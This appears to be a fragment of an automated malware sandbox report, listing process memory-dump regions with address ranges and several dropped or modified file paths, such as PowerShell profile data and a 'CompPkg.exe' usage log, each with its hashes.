memory/2660-86-0x0000000008590000-0x0000000008B36000-memory.dmp
memory/2660-88-0x0000000007510000-0x00000000075A2000-memory.dmp
memory/1444-89-0x0000000006FC0000-0x0000000006FCA000-memory.dmp
memory/1444-90-0x00000000071E0000-0x0000000007276000-memory.dmp
memory/5768-91-0x0000018E487C0000-0x0000018E487D2000-memory.dmp
memory/5768-92-0x0000018E48820000-0x0000018E4885C000-memory.dmp
memory/1444-93-0x0000000007150000-0x0000000007161000-memory.dmp
memory/1444-94-0x0000000007190000-0x000000000719E000-memory.dmp
memory/1444-95-0x00000000071A0000-0x00000000071B5000-memory.dmp
memory/1444-96-0x00000000072A0000-0x00000000072BA000-memory.dmp
memory/1444-97-0x0000000007280000-0x0000000007288000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 86c4045b8d294c8282009af508fff707 |
| SHA1 | 56932ef154b5ed1046300446bacf50a8d44c147b |
| SHA256 | 2890b9aa2b9b856fe1b3de029e8bb42d28f961ee99c1362b5c31a91ec3fee059 |
| SHA512 | f1bf59232a6ab749ace9245a89029f0e064f132c9515477c0213c6f942341d2b5493cd0adbaa3a401b87078aec3dd9f1f5eed9ad393672e555c02e539a079648 |
memory/5768-102-0x0000018E48800000-0x0000018E48812000-memory.dmp
memory/5768-103-0x00007FF973103000-0x00007FF973105000-memory.dmp
memory/5664-112-0x000001F577350000-0x000001F577372000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 86acdf583fc319a406c3f74a61d663fa |
| SHA1 | 604996c51c6aec2620a45decd4e59764e708c08f |
| SHA256 | 3a88e39b770621c79be35fbf685baf5e3cc9ce16fcf91bc67ac06247d081278c |
| SHA512 | f3e990090e66e4fe13659827b9405dc312abf81e6432da18ae11d0fa4b0ed5399bb4d9dc597459b5d5bdf333efdac702db4d78305ae9c0768f37229a27c17368 |
memory/5664-115-0x000001F5773C0000-0x000001F57750F000-memory.dmp
memory/5768-116-0x00007FF973100000-0x00007FF973BC2000-memory.dmp
memory/848-117-0x0000000140000000-0x000000014002B000-memory.dmp
memory/848-122-0x0000000140000000-0x000000014002B000-memory.dmp
memory/848-120-0x0000000140000000-0x000000014002B000-memory.dmp
memory/848-118-0x0000000140000000-0x000000014002B000-memory.dmp
memory/848-119-0x0000000140000000-0x000000014002B000-memory.dmp
memory/5268-143-0x0000000140000000-0x000000014000D000-memory.dmp
memory/5268-149-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2336-154-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2336-155-0x0000026F5B100000-0x0000026F5B120000-memory.dmp
memory/2336-160-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2336-159-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2336-158-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2336-157-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2336-156-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2336-153-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2336-152-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2336-151-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2336-148-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2336-150-0x0000000140000000-0x0000000140835000-memory.dmp
memory/5268-142-0x0000000140000000-0x000000014000D000-memory.dmp
memory/5268-141-0x0000000140000000-0x000000014000D000-memory.dmp
memory/5268-140-0x0000000140000000-0x000000014000D000-memory.dmp
memory/5268-139-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2336-147-0x0000000140000000-0x0000000140835000-memory.dmp
memory/5316-169-0x00000154C6B90000-0x00000154C6BBA000-memory.dmp
memory/5316-170-0x00007FF994120000-0x00007FF994329000-memory.dmp
memory/5316-171-0x00007FF9930F0000-0x00007FF9931AD000-memory.dmp
memory/4636-172-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4636-177-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4636-175-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4636-174-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4636-173-0x0000000140000000-0x0000000140008000-memory.dmp
memory/908-179-0x00007FF994120000-0x00007FF994329000-memory.dmp
memory/908-180-0x00007FF9930F0000-0x00007FF9931AD000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bb7d9cd87343b2c81c21c7b27e6ab694 |
| SHA1 | 27475110d09f1fc948f1d5ecf3e41aba752401fd |
| SHA256 | b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df |
| SHA512 | bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b |
memory/4636-191-0x00007FF994120000-0x00007FF994329000-memory.dmp
memory/4396-190-0x00007FF9930F0000-0x00007FF9931AD000-memory.dmp
memory/4396-189-0x00007FF994120000-0x00007FF994329000-memory.dmp
memory/4636-192-0x00007FF9930F0000-0x00007FF9931AD000-memory.dmp
memory/632-198-0x000002191D650000-0x000002191D67B000-memory.dmp
memory/632-197-0x000002191D650000-0x000002191D67B000-memory.dmp
memory/632-196-0x000002191D3D0000-0x000002191D3F5000-memory.dmp
memory/4396-193-0x0000000140000000-0x0000000140008000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkg.exe.log
| MD5 | 4a01567f513143419390cb40e6abaf71 |
| SHA1 | d0d714d6e526a652fc4e5de4e6040d6b0e7687ab |
| SHA256 | 6efaeb6a1b391155453a57c7e437575bb18efc174f3099d984d9dea49eecebad |
| SHA512 | 379fcb42d0f72d302482fadd4f25cbfa9c5f6a9c50222877d0eed91f237ec688eb52f65ee0d3fccfd017a6b14bd36f34fa0b77a388728fe3942a981322d7a4bc |
memory/5608-899-0x0000000000820000-0x000000000088A000-memory.dmp
memory/5208-922-0x0000000000180000-0x00000000001EA000-memory.dmp